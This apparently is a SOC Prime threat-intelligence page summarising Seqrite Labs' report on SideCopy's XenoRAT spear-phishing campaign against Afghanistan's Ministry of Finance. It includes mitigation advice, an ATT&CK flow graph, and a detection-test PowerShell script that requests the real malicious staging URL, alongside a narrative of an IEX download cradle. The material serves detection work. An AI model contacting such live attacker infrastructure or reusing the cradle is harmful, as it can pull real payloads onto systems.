SOC Prime Bias: Critical

02 Jun 2026 19:24 UTC
newspaper icon Seqrite Labs

Operation XENOFISCAL: SideCopy Deploys Persistent XenoRAT Against Afghanistan’s Ministry of Finance

Author Photo
SOC Prime Team linkedin icon Follow
Operation XENOFISCAL: SideCopy Deploys Persistent XenoRAT Against Afghanistan’s Ministry of Finance
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Summary

The report outlines a spear-phishing operation in which a malicious LNK file triggers mshta.exe to download and execute a remote HTA payload. That payload creates registry-based persistence and eventually deploys XenoRAT 1.8.7, which communicates with command-and-control infrastructure hosted on bulletproof servers in Europe. The activity is attributed to the Pakistan-linked SideCopy group, believed to operate as a sub-cluster of APT36. The campaign specifically targets Afghanistan’s Ministry of Finance and its provincial finance offices.

Investigation

Seqrite Labs analyzed the complete intrusion chain, following execution from the initial LNK file through several loader DLLs, HTA and JavaScript stages, and a .NET shellcode loader that delivered the final XenoRAT payload. Their technical review uncovered abuse of living-off-the-land binaries, custom Base64 and GZIP decoding routines, in-memory reflection, and persistence achieved through Run keys and a scheduled task. Infrastructure analysis linked the operation to an Afghan education-themed domain and a hosting provider based in Bulgaria.

Mitigation

Organizations should block execution of LNK files from untrusted sources and closely monitor the use of mshta.exe. PowerShell and HTA execution should be controlled through strict allow-listing policies. Defenders should also detect suspicious Run key creation and scheduled tasks named XenoUpdateManager, while monitoring outbound connections to the known malicious domains and IP ranges tied to the campaign.

Response

Affected systems should be isolated immediately, the malicious Run key and scheduled task removed, and the XenoRAT process terminated. Investigators should collect memory and file-based artifacts for forensic analysis and then hunt across the environment for matching indicators. Any compromised credentials should be reset, and network segmentation should be enforced to reduce further command-and-control communication.

"graph TB %% Class definitions classDef phase fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 classDef process fill:#ccffcc classDef technique fill:#dddddd %% Nodes phase_initial["<b>Phase</b> – Initial Access<br/><b>Technique</b> – T1566.001 Spearphishing Attachment<br/>Email with ZIP containing malicious LNK"] class phase_initial phase file_lnk["<b>File</b> – …pdf.lnk<br/>LNK Icon Smuggling T1027.012"] class file_lnk technique proc_mshta["<b>Process</b> – mshta.exe<br/>System Binary Proxy Execution T1218.005"] class proc_mshta process tool_htapayload["<b>Tool</b> – HTA Payload<br/>Fetched from https://abimj.edu.af/index.php"] class tool_htapayload tool phase_execution["<b>Phase</b> – Execution<br/><b>Technique</b> – T1059.007 JavaScript Interpreter"] class phase_execution phase tech_html_smuggling["<b>Technique</b> – T1027.006 HTML Smuggling"] class tech_html_smuggling technique tech_obfuscation["<b>Technique</b> – T1027 Obfuscated Files or Information"] class tech_obfuscation technique malware_loader["<b>Malware</b> – Inu2011memory .NET Loader<br/>Reflective Code Loading T1620"] class malware_loader malware phase_persistence["<b>Phase</b> – Persistence"] class phase_persistence phase tech_registry_run["<b>Technique</b> – T1547.001 Registry Run Keys/Startup Folder"] class tech_registry_run technique tech_scheduled_task["<b>Technique</b> – T1053 Scheduled Task/Job"] class tech_scheduled_task technique tool_batch["<b>Tool</b> – Hidden Batch File"] class tool_batch tool phase_defense["<b>Phase</b> – Defense Evasion"] class phase_defense phase tech_process_injection["<b>Technique</b> – T1055 Process Injection"] class tech_process_injection technique tech_shared_modules["<b>Technique</b> – T1129 Shared Modules"] class tech_shared_modules technique phase_discovery["<b>Phase</b> – Discovery"] class phase_discovery phase tech_system_info["<b>Technique</b> – T1082 System Information Discovery"] class tech_system_info technique tech_av_discovery["<b>Technique</b> – T1518 Security Software Discovery"] class tech_av_discovery technique phase_collection["<b>Phase</b> – Collection"] class phase_collection phase tech_keylogging["<b>Technique</b> – T1056.001 Keylogging"] class tech_keylogging technique tech_screen_capture["<b>Technique</b> – T1113 Screen Capture"] class tech_screen_capture technique tech_audio_capture["<b>Technique</b> – T1123 Audio Capture"] class tech_audio_capture technique tech_video_capture["<b>Technique</b> – T1125 Video Capture"] class tech_video_capture technique phase_c2["<b>Phase</b> – Command and Control"] class phase_c2 phase tech_encrypted_channel["<b>Technique</b> – T1095 Encrypted Channel"] class tech_encrypted_channel technique tech_web_service["<b>Technique</b> – T1102 Web Service"] class tech_web_service technique tech_external_proxy["<b>Technique</b> – T1573 Proxy External Proxy"] class tech_external_proxy technique phase_cleanup["<b>Phase</b> – Cleanup"] class phase_cleanup phase tech_file_deletion["<b>Technique</b> – T1070.004 File Deletion"] class tech_file_deletion technique tech_clear_persistence["<b>Technique</b> – T1070.009 Clear Persistence"] class tech_clear_persistence technique malware_xenorat["<b>Malware</b> – XenoRAT<br/>Final payload providing remote access"] class malware_xenorat malware tech_appdomain_manager["<b>Technique</b> – T1574.014 Hijack Execution Flow AppDomainManager"] class tech_appdomain_manager technique %% Connections phase_initial –>|delivers| file_lnk file_lnk –>|executes via| proc_mshta proc_mshta –>|downloads| tool_htapayload tool_htapayload –>|runs| phase_execution phase_execution –>|uses| tech_html_smuggling phase_execution –>|uses| tech_obfuscation phase_execution –>|loads| malware_loader malware_loader –>|creates| phase_persistence phase_persistence –>|adds| tech_registry_run phase_persistence –>|adds| tech_scheduled_task tech_registry_run –>|implemented by| tool_batch tech_scheduled_task –>|implemented by| tool_batch phase_persistence –>|leads to| phase_defense phase_defense –>|employs| tech_process_injection phase_defense –>|uses| tech_shared_modules phase_defense –>|includes| tech_obfuscation phase_defense –>|leads to| phase_discovery phase_discovery –>|gathers| tech_system_info phase_discovery –>|enumerates| tech_av_discovery phase_discovery –>|leads to| phase_collection phase_collection –>|captures| tech_keylogging phase_collection –>|captures| tech_screen_capture phase_collection –>|captures| tech_audio_capture phase_collection –>|captures| tech_video_capture phase_collection –>|feeds into| phase_c2 phase_c2 –>|uses| tech_encrypted_channel phase_c2 –>|uses| tech_web_service phase_c2 –>|uses| tech_external_proxy phase_c2 –>|controls| malware_xenorat malware_xenorat –>|uses| tech_appdomain_manager malware_xenorat –>|triggers| phase_cleanup phase_cleanup –>|executes| tech_file_deletion phase_cleanup –>|executes| tech_clear_persistence %% Apply classes class phase_initial,phase_execution,phase_persistence,phase_defense,phase_discovery,phase_collection,phase_c2,phase_cleanup phase class file_lnk,proc_mshta technique class tool_htapayload,tool_batch tool class malware_loader,malware_xenorat malware class tech_html_smuggling,tech_obfuscation,tech_registry_run,tech_scheduled_task,tech_process_injection,tech_shared_modules,tech_system_info,tech_av_discovery,tech_keylogging,tech_screen_capture,tech_audio_capture,tech_video_capture,tech_encrypted_channel,tech_web_service,tech_external_proxy,tech_file_deletion,tech_clear_persistence,tech_appdomain_manager technique "

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:

    1. Reconnaissance: The attacker knows that the Afghan education domain (abimj.edu.af) hosts malicious PHP scripts used as a download cradle.
    2. Execution: Using a compromised PowerShell session, the attacker issues an Invoke-WebRequest call to the exact malicious endpoint /index.php.
    3. Payload Retrieval: The PHP script returns a Base64‑encoded PowerShell payload that is immediately executed via IEX. (The payload execution itself is not required for the rule to fire; only the HTTP request matters.)

  • Regression Test Script:

    <# 
Simulate malicious access to the Afghan education domain.
This script reproduces the exact request that should trigger the detection rule.
#>

$url = "https://abimj.edu.af/index.php"
try {
    Write-Host "[*] Sending request to $url"
    $response = Invoke-WebRequest -Uri $url -UseBasicParsing -Headers @{
        "User-Agent" = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
    }
    Write-Host "[+] Received HTTP $($response.StatusCode) – detection should have fired."
} catch {
    Write-Error "Request failed: $_"
}

  • Cleanup Commands:

    # Clear DNS cache and any temporary proxy connections
ipconfig /flushdns
# Optionally, remove the script file if saved to disk
Remove-Item -Path $MyInvocation.MyCommand.Path -Force

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free